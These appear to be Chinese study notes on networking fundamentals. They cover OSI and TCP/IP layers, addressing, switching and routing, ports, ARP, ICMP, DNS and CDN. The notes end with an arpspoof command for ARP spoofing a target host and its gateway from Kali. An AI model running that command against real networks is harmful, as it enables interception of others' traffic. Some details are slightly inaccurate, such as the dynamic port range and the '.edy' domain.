1. OSI七层模型与TCP/IP四层模型

TCP/IP四层模型	OSI七层模型	核心功能	协议/设备
4. 应用层	7. 应用层	针对特定应用，为特定应用提供服务并规定应用通信中相应的细节	http、https、ftp、sftp、ftps、smtp、pop3、IMAP、dns、telnet、ssh
	6. 表示层	转换数据格式，将应用生产的数据转换为网络可传输的数据格式，或将上一层的数据转换为下一层可处理的数据格式	html、SSL、TLS
	5. 会话层	建立、管理、终止应用之间的会话	SIP、SMB、NFS
3. 传输层	4. 传输层	负责两个节点间的数据传输，端到端数据可靠/快速传输	TCP、UDP、DCCP、 QUIC
2. 网络层（网际层）	3.网络层	跨网段路由转发、IP地址管理与路由选择	ARP、IP、路由
1. 网络接口层（链路层）	2. 数据链路层	互联设备之间的传输和数据帧/比特流转换	以太网、交换机、网卡、双绞线、光纤
	1. 物理层	比特流与电子信号转换

2. MAC地址、交换机、IP、路由器

2.1 MAC地址，网络设备的身份证

定义：媒体访问控制地址（Media Access Control Address)，是网络设备（网卡）的物理地址，由厂商固化在硬件中，无法修改，全球唯一。

格式：共48位（6字节），通常由16进制表示，分前24位（厂商标识OUI）和后24位（厂商分配的设备编号），例如：2C-1B-8D-70-AE-31（也可用冒号分隔或无分隔）。

核心作用：在局域网（同一广播域）中标识设备，是数据链路层的核心标识。

特点：唯一、不可修改（某些软件可暂时修改）、仅局域网有效。

2.2 交换机（局域网内的数据分拣）

工作层级：数据链路层（二层设备），部分高端交换机支持三层路由转发功能。

核心功能：在同一局域网内根据数据帧中的MAC地址进行数据转发至对应端口

关键机制：MAC地址表。交换机会自动学习连接设备的MAC地址，建立MAC地址-端口映射表。当交换机接收到数据时，查询MAC地址表，有则转发至对应端口，没有就进行广播。

2.3 IP地址（网络层的逻辑地址）

定义：互联网协议地址（Internet Protocol Address)，是给网络中的设备分配的逻辑地址，用于标识设备所在的网络和设备本身。

格式：

        IPv4：共32位，分为4个字节，用点分十进制表示，例如：192.168.1.1；

        IPv6：128 位，分为 8 组，每组 16 位，用冒号分隔，采用十六进制表示，示例：2001:0db8:85a3:0000:0000:8a2e:0370:7334

构成：网络位（标识所属网段）+主机位（标识网段内的具体设备），通过子网掩码区分（例如：255.255.255.0表示前24位网络位）

作用：实现跨网段通信（不同局域网设备的连接），是网络层（三层）路由转发的核心

特点：可修改，手动配置或通过DHCP服务自动获取，跨网段有效、局域网内唯一

2.4 路由器：跨网段组网

工作层级：网络层（三层设备）

核心功能：连接不同的网络，根据数据中的目标IP地址，通过路由表选择最优路径，将数据转发到目标网络，实现跨网段通信

关键机制：路由表，收到数据后提取目标IP，判断是否在本地直连网段，是则直接转发，否则查询路由表， 根据最优路径转发

特点：解决跨网段通信问题

3. 网络类型

3.1 根据覆盖范围划分

网络类型	覆盖范围	核心特点	应用场景
局域网（LAN）	小范围（1km内）	传输速度快、延迟低、同一广播域	家庭网络、公司办公网络、机房
城域网 （MAN）	城市级（1-100km）	连接多个局域网，传输速度中等，由运营商或企业建设	城市政务网络
广域网 （WAN）	大范围（100km以上，跨城市/国家）	传输距离源、延迟较高，依赖公共通信链路（光纤、卫星等）	互联网

4. IP分类（IPv4）

IPv4地址通过首段IP值划分位A、B、C、D、E五类，核心是区分网络位和主机位，适配不同规模的网络需求。

4.1 核心分类原则

IP分类	首段IP范围	网络位长度	默认子网掩码	适用场景	特殊说明
A类	1-126	8位	255.0.0.0	大型网络（主机数量多）	127.0.0.0网段位回环地址（本机网络测试）
B类	128-191	16位	255.255.0.0	中型网络（企业级）	无
C类	192-223	24位	255.255.255.0	小型网络（家庭、小公司）	最常用的分类IP
D类	224-239	无固定网络位	无	组播通信	不分配给单个设备
E类	240-255	无固定网络位	无	科研、实验	不对外开放

4.2 私有IP与公有IP

私有IP：仅局域网内有效，不可直接访问互联网，不同局域网可重复使用，通过NAT转换（路由器功能）共享公有IP上网

公有IP：互联网中唯一，需向ISP申请，用于设备接入互联网。

5. 端口号（传输层的应用程序标识）

端口号是传输层（TCP/UDP协议）的逻辑标识，用于区分同一设备上的不同应用程序，与IP地址配合，精准定位目标应用。

格式：16位，范围0-65535

IANA（互联网编号分配机构）将端口号划分位3大类，是网络配置、渗透测试、服务部署的核心依据：

端口范围	官方名称	典型特点	示例
1-1023	知名端口	固定分配给标准网络服务，全球通用	21(FTP), 22(SSH), 80(HTTP), 443(HTTPS)
1024-49151	注册端口	由IANA注册给非标准但常用的应用/服务，非强制	3306(MySQL), 6379(Redis), 8080(HTTP备用), 8081(HTTPS备用）
49151-65535	动态端口	客户端随机分配，用于发起连接，服务端不主动使用	客户端访问网站时，系统自动分配50000+端口作为源端口

6. 核心网络协议（ARP与ICMP）

ARP与ICMP均为网络层核心辅助协议，用于解决解决“地址映射”和“网络连通性检测”问题，网络通信的基础支撑。

6.1 ARP协议（地址解析协议，IP—MAC映射）

核心定义：用于将“目标IP地址”解析为“目标MAC地址”，解决局域网内“知道IP但找不到设备”的问题。

工作流程（局域网内）：设备A向目标主机（192.168.1.110）发送数据，先查询本地ARP缓存表，若存在对应MAC，直接封装数据帧发送；若无，则发送“ARP请求”广播包（目标IP：192.168.1.110，目标MAC：FF:FF:FF:FF:FF:FF)，局域网所有设备收到ARP广播，仅目标主机（192.168.1.110）响应，发送“ARP响应”单播包（其他设备丢弃该ARP请求包），设备A收到响应后，更新ARP缓存表，后续通信直接使用缓存中的MAC地址。

6.2 ICMP协议（互联网控制消息协议，连通性测试）

核心定义：运行在网络层，用主机、路由器之间传递控制消息（联通状态、错误提示），不传输应用数据。

核心功能：

        1.连通性检测（如ping命令）

        2.路由追踪：通过“时间戳请求”“TTL超时”报文实现（如Windows系统tracert命令/Linux系统traceroute命令）

        3.错误提示：如目标主机不可达、端口不可达时，路由器发送ICMP错误报文给源设备

7. 域名与DNS（域名-IP）

7.1 域名（给某个/些IP起的名字）

定义：用多个字符串（标签）用点“.”分隔组成的互联网地址，用于标识服务器、网站等，全球唯一

目的：解决IP地址较难记忆的问题

域名层级结构（从右到左，层级升高）

        1. 根域名：最顶层（最右侧），用“.”表示（通常忽略，如www.baidu.com.）

        2. 顶域名（TLD）：根域名下一级，分为通用顶域名（.com商业、.org非营利组织、.edy教育、.gov政府）和国家顶级域名（.cn中国、.us美国)

        3. 二级域名：企业/个人向域名注册商申请的核心域名（如baidu.com中的“baidu”）

        4. 子域名：二级域名下自定义的域名（如www.baidu.com中的“www”，表示web服务器）

7.2 DNS（域名服务器，将域名解析为IP地址）

核心定义：运用在应用层的分布式数据库系统，通过DNS服务器实现“域名→IP地址”的解析（支持IP→域名的反向解析）

优势：缓存（提高解析速度）、负载均衡（同一域名可解析到多个IP地址，分发流量）

8. CDN（内容分发网络）

核心定义：CDN（Content Delivery Network）是部署在全球各地的分布式服务器集群，让用户从最近的CDN服务器获取资源，实现快速访问。

优势：

        1. 加速访问：缩短资源传输距离，降低延迟

        2. 提高可用性，有一定容错率：当某个节点故障时，自动切换到其他节点

9. ARP欺骗攻击

#kali系统中执行

arpspoof -i <网卡名> -t <目标主机IP> <网关>

arpspoof -i etho -t 192.168.1.110 192.168.1.1